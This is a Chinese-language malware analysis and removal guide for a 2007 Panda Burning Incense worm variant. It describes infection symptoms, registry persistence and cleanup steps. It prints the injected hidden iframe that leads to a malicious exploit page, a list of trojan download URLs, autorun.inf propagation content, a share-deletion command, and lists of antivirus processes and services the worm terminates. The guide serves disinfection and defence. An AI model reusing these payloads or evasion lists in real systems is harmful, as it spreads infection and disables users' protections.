文件名稱:nvscv32.exe
病毒名稱:目前各殺毒軟件無法查殺(已經將病毒樣本上報各殺毒廠商)
中文名稱:(尼姆亞,熊貓燒香)
病毒大小:68,570 字節
編寫語言:Borland Delphi 6.0 - 7.0
加殼方式:FSG 2.0 -> bart/xt
發現時間:2007.1.16
危害等級:高
一、病毒描述:
含有病毒體的文件被運行后,病毒將自身拷貝至系統目錄,同時修改注冊表將自身設置為開機啟動項,并遍歷各個驅動器,將自身寫入磁盤根目錄下,增加一個 Autorun.inf文件,使得用戶打開該盤時激活病毒體。隨后病毒體開一個線程進行本地文件感染,并對局域網其他電腦進行掃描,同時開另外一個線程連接某網站下載木馬程序進行發動惡意攻擊。
二:中毒現象:
1:在系統每個分區根目錄下存在setup.exe和autorun.inf文件(A和B盤不感染)。
2:無法手工修改“文件夾選項”將隱藏文件顯示出來。
3:在每個感染后的文件夾中可見Desktop_ini的隱藏文件,內容為感染日期 如:2007-1-16
4:電腦上的所有腳本文件中加入以下代碼:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>
5:中毒后的機器上常見的反病毒軟件及防火墻無法正常開啟及運行。
6:不能正常使用任務管理器,SREng.exe等工具。
7:無故的向外發包,連接局域網中其他機器。
三:技術分析
1:病毒文件運行后,將自身復制到%SystemRoot%\system32\drivers\nvscv32.exe
建立注冊表自啟動項:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"
2:查找反病毒窗體病毒結束相關進程:
天網防火墻
virusscan
symantec antivirus
system safety monitor
system repair engineer
wrapped gift killer
游戲木馬檢測大師
超級巡警
3:結束以下進程:
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
taskmgr.exe
msconfig.exe
regedit.exe
sreng.exe
4:禁用下列服務:
schedule
sharedaccess
rsccenter
rsravmon
rsccenter
kvwsc
kvsrvxp
kvwsc
kvsrvxp
kavsvc
avp
avp
kavsvc
mcafeeframework
mcshield
mctaskmanager
mcafeeframework
mcshield
mctaskmanager
navapsvc
wscsvc
kpfwsvc
sndsrvc
ccproxy
ccevtmgr
ccsetmgr
spbbcsvc
symantec core lc
npfmntor
mskservice
firesvc
5:刪除下列注冊表項:
software\microsoft\windows\currentversion\run\ravtask
software\microsoft\windows\currentversion\run\kvmonxp
software\microsoft\windows\currentversion\run\kav
software\microsoft\windows\currentversion\run\kavpersonal50
software\microsoft\windows\currentversion\run\mcafeeupdaterui
software\microsoft\windows\currentversion\run\network associates error reporting service
software\microsoft\windows\currentversion\run\shstatexe
software\microsoft\windows\currentversion\run\ylive.exe
software\microsoft\windows\currentversion\run\yassistse
6:感染所有可執行文件,并將圖標改成
(這次不是熊貓燒香那個圖標了)
7:跳過下列目錄:
windows
winnt
systemvolumeinformation
recycled
windowsnt
windowsupdate
windowsmediaplayer
outlookexpress
netmeeting
commonfiles
complusapplications
commonfiles
messenger
installshieldinstallationinformation
msn
microsoftfrontpage
moviemaker
msngaminzone
8:刪除*.gho備份文件.
9:在所有驅動器根目錄建立自身文件副本setup.exe,建立autorun.inf文件使病毒自動運行,設置文件屬性為隱藏、只讀、系統.
autorun.inf內容:
程序代碼
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
10:刪除共享:cmd.exe /c net share admin$ /del /y
11:在機器上所有腳本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>,此代碼地址是一個利用MS-06014漏洞攻擊的網頁木馬,一旦用戶瀏覽中此病毒的服務器上的網頁,如果系統沒有打補丁,就會下載執行此病毒。
12:掃描局域網機器,一旦發現漏洞,就迅速傳播。
13:在后臺訪問http://www.whboy.net/update/wormcn.txt,根據下載列表下載其他病毒。
目前下載列表如下:
http://www.krvkr.com/down/cq.exe
http://www.krvkr.com/down/mh.exe
http://www.krvkr.com/down/my.exe
http://www.krvkr.com/down/wl.exe
http://www.krvkr.com/down/rx.exe
http://www.krvkr.com/down/wow.exe
http://www.krvkr.com/down/zt.exe
http://www.krvkr.com/down/wm.exe
http://www.krvkr.com/down/dj.exe
http://www.krvkr.com/cn/iechajian.exe
到此病毒行為分析完畢。
四:Sec120.Com專家解決方案:
1:關閉網絡共享,斷開網絡。
2:使用IceSword結束掉nvscv32.exe進程(速度要快,搶在病毒感染IceSword前)
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的數值改為1
4:刪除注冊表啟動項
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"
5:刪除C:\WINDOWS\system32\drivers\nvscv32.exe
6:刪除每個盤根目錄下的autorun.inf文件和setup.exe文件,利用搜索功能,將Desktop_.ini全部刪除。
7:如果電腦上有腳本文件,將病毒代碼全部刪除。
8:關閉系統的自動播放功能。
這樣就基本上將病毒清除了